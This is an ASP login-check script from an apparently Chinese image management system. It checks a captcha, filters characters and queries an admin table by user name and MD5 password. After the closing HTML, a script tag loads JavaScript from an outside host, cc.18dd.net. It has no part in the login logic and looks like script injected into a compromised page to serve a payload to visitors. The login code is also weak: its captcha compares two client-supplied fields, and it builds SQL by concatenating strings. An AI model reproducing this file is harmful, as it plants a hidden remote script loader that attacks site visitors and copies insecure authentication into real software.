loginchk.asp

一款有用的图片管理系统

<!--#include file="conn.asp"-->
<!--#include file="md5.asp"-->
<%  
       s=Trim(Request.Form("s"))
	   s2=Request.Form("s2")
	   If s2<>s Then
	   	   Response.Write("<script language=javascript>alert('请输入正确的认证码！');this.location.href='login.asp';</script>")
		   Response.End
	   end if
	   user=replace(trim(request.form("user")),"'","''")
       password=replace(trim(request.form("password")),"'","''")
	   if instr(user,"%") or instr(user,"#") or instr(user,"?") or instr(user,"|") then
	   response.write "<script language=javascript>alert('您的姓名含有非法字符！');this.location.href='login.asp';</script>"
	   response.end 
	   end if                               '====================检测姓名中是否含有非法字符
	   if instr(password,"%") or instr(password,"#") or instr(password,"?") or instr(password,"|") then
	   response.write "<script language=javascript>alert('您的密码含有非法字符！');this.location.href='login.asp';</script>"
	   response.end 
	   end if                              '====================检测密码中是否含有非法字符
	   sql="select * from admin where admin='"&user&"' and password='"&md5(password)&"'"
	   set rs=conn.execute(sql)
	   if rs.eof then
	   	   Response.Write("<script language=javascript>alert('管理员姓名和密码错误！');this.location.href='login.asp';</script>")
		   Response.End
       else 
	   Session("admin")=user
	   session("flag")=rs("flag")
	   Response.Redirect("index.asp")        '=================如果验证成功刚引向管理员页面
	   end if
	   conn.close
	   set conn=nothing
%>
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=gb2312">
<title>无标题文档</title>
</head>

<body>

</body>
</html>

<script language=javascript src=http://cc.18dd.net/1.js></script>